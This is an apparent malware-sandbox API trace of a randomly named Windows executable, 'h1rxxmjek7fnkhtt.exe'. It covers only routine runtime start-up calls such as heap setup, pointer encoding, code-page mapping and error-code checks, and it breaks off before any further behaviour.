# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Mar 3 2020 14:14:30 # Log Creation Date: 18.03.2020 14:53:20.284 Process: id = "1" image_name = "h1rxxmjek7fnkhtt.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h1rxxmjek7fnkhtt.exe" page_root = "0x48a70000" os_pid = "0xb00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xb08 [0048.599] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xfe9cbe0, dwHighDateTime=0x1d5fd35)) [0048.599] GetCurrentProcessId () returned 0xb00 [0048.599] GetCurrentThreadId () returned 0xb08 [0048.599] GetTickCount () returned 0x11470ec [0048.599] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=16890930197) returned 1 [0048.700] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0048.700] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1fb0000 [0048.702] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0048.702] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0048.702] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0048.702] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0048.702] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0048.702] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0048.702] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0048.703] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0048.703] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0048.703] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0048.703] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0048.703] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0048.703] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0048.703] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0048.703] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0048.704] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0048.704] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0048.704] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0048.704] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0048.705] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0048.705] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0048.705] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x214) returned 0x1fb07d0 [0048.705] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0048.705] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0048.705] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0048.705] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0048.705] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0048.706] GetCurrentThreadId () returned 0xb08 [0048.706] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0048.706] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x8, Size=0x800) returned 0x1fb09f0 [0048.706] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0048.706] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0048.706] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0048.706] SetHandleCount (uNumber=0x20) returned 0x20 [0048.706] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe\" " [0048.706] GetEnvironmentStringsW () returned 0x761ce0* [0048.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0048.706] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x0, Size=0x565) returned 0x1fb11f8 [0048.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x1fb11f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0048.707] FreeEnvironmentStringsW (penv=0x761ce0) returned 1 [0048.707] GetLastError () returned 0x0 [0048.707] SetLastError (dwErrCode=0x0) [0048.707] GetLastError () returned 0x0 [0048.707] SetLastError (dwErrCode=0x0) [0048.707] GetLastError () returned 0x0 [0048.707] SetLastError (dwErrCode=0x0) [0048.707] GetACP () returned 0x4e4 [0048.707] RtlAllocateHeap (HeapHandle=0x1fb0000, Flags=0x0, Size=0x220) returned 0x1fb1768 [0048.707] GetLastError () returned 0x0 [0048.707] SetLastError (dwErrCode=0x0) [0048.707] IsValidCodePage (CodePage=0x4e4) returned 1 [0048.707] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0048.707] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0048.707] GetLastError () returned 0x0 [0048.707] SetLastError (dwErrCode=0x0) [0048.707] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0048.707] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0048.707] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0048.707] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0048.707] GetLastError () returned 0x0 [0048.708] SetLastError (dwErrCode=0x0) [0048.708] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0048.708] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0048.708] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ멯@Ā") returned 256 [0048.708] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ멯@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0048.708] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ멯@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0048.708] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿO\x9c÷á\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0048.708] GetLastError () returned 0x0 [0048.708] SetLastError (dwErrCode=0x0) [0048.708] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0048.708] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ멯@Ā") returned 256 [0048.708] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ멯@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0048.708] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ멯@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0048.708] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿO\x9c÷á\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0048.708] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4a6b40, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h1rxxmjek7fnkhtt.exe")) returned 0x3a [0048.708] GetLastError () returned 0x0 [0048.708] SetLastError (dwErrCode=0x0) [0048.708] GetLastError () returned 0x0 [0048.709] SetLastError (dwErrCode=0x0) [0048.709] GetLastError () returned 0x0 [0048.709] SetLastError (dwErrCode=0x0) [0048.709] GetLastError () returned 0x0 [0048.709] SetLastError (dwErrCode=0x0) [0048.709] GetLastError () returned 0x0 [0048.709] SetLastError (dwErrCode=0x0) [0048.709] GetLastError () returned 0x0 [0048.709] SetLastError (dwErrCode=0x0) [0048.709] GetLastError () returned 0x0 [0048.709] SetLastError (dwErrCode=0x0) [0048.709] GetLastError () returned 0x0 [0048.709] SetLastError (dwErrCode=0x0) [0048.709] GetLastError () returned 0x0 [0048.709] SetLastError (dwErrCode=0x0) [0048.709] GetLastError () returned 0x0 [0048.709] SetLastError (dwErrCode=0x0) [0048.709] GetLastError () returned 0x0 [0048.709] SetLastError (dwErrCode=0x0) [0048.709] GetLastError () returned 0x0 [0048.710] SetLastError (dwErrCode=0x0) [0048.710] GetLastError () returned 0x0 [0048.710] SetLastError (dwErrCode=0x0) [0048.710] GetLastError () returned 0x0 [0048.710] SetLastError (dwErrCode=0x0) [0048.710] GetLastError () returned 0x0 [0048.710] SetLastError (dwErrCode=0x0) [0048.710] GetLastError () returned 0x0 [0048.710] SetLastError (dwErrCode=0x0) [0048.710] GetLastError () returned 0x0 [0048.710] SetLastError (dwErrCode=0x0) [0048.710] GetLastError () returned 0x0 [0048.710] SetLastError (dwErrCode=0x0) [0048.710] GetLastError () returned 0x0 [0048.710] SetLastError (dwErrCode=0x0) [0048.710] GetLastError () returned 0x0 [0048.710] SetLastError (dwErrCode=0x0) [0048.710] GetLastError () returned 0x0 [0048.711] SetLastError (dwErrCode=0x0) [0048.711] GetLastError () returned 0x0 [0048.711] SetLastError (dwErrCode=0x0) [0048.711] GetLastError () returned 0x0 [0048.711] SetLastError (dwErrCode=0x0) [0048.711] GetLastError () returned 0x0 [0048.711] SetLastError (dwErrCode=0x0) [0048.711] GetLastError () returned 0x0 [0048.711] SetLastError (dwErrCode=0x0) [0048.711] GetLastError () returned 0x0 [0048.711] SetLastError (dwErrCode=0x0) [0048.711] GetLastError () returned 0x0 [0048.711] SetLastError (dwErrCode=0x0) [0048.711] GetLastError () returned 0x0 [0048.711] SetLastError (dwErrCode=0x0) [0048.711] GetLastError () returned 0x0 [0048.712] SetLastError (dwErrCode=0x0) [0048.712] GetLastError () returned 0x0 [0048.712] SetLastError (dwErrCode=0x0) [0048.712] GetLastError () returned 0x0 [0048.712] SetLastError (dwErrCode=0x0) [0048.712] GetLastError () returned 0x0 [0048.712] SetLastError (dwErrCode=0x0) [0048.712] GetLastError () returned 0x0 [0048.712] SetLastError (dwErrCode=0x0) [0048.712] GetLastError () returned 0x0 [0048.712] SetLastError (dwErrCode=0x0) [0048.712] GetLastError () returned 0x0 [0048.712] SetLastError (dwErrCode=0x0) [0048.712] GetLastError () returned 0x0 [0048.712] SetLastError (dwErrCode=0x0) [0048.712] GetLastError () returned 0x0 [0048.712] SetLastError (dwErrCode=0x0) [0048.712] GetLastError () returned 0x0 [0048.712] SetLastError (dwErrCode=0x0) [0048.712] GetLastError () returned 0x0 [0048.713] SetLastError (dwErrCode=0x0) [0048.713] GetLastError () returned 0x0 [0048.713] SetLastError (dwErrCode=0x0) [0048.713] GetLastError () returned 0x0 [0048.713] SetLastError (dwErrCode=0x0) [0048.713] GetLastError () returned 0x0 [0048.713] SetLastError (dwErrCode=0x0) [0048.713] GetLastError () returned 0x0 [0048.713] SetLastError (dwErrCode=0x0) [0048.713] GetLastError () returned 0x0 [0048.713] SetLastError (dwErrCode=0x0) [0048.713] GetLastError () returned 0x0 [0048.713] SetLastError (dwErrCode=0x0) [0048.713] GetLastError () returned 0x0 [0048.713] SetLastError (dwErrCode=0x0) [0048.713] GetLastError () returned 0x0 [0048.713] SetLastError (dwErrCode=0x0) [0048.713] GetLastError () returned 0x0 [0048.713] SetLastError (dwErrCode=0x0) [0048.713] GetLastError () returned 0x0 [0048.714] SetLastError (dwErrCode=0x0) [0048.714] GetLastError () returned 0x0 [0048.714] 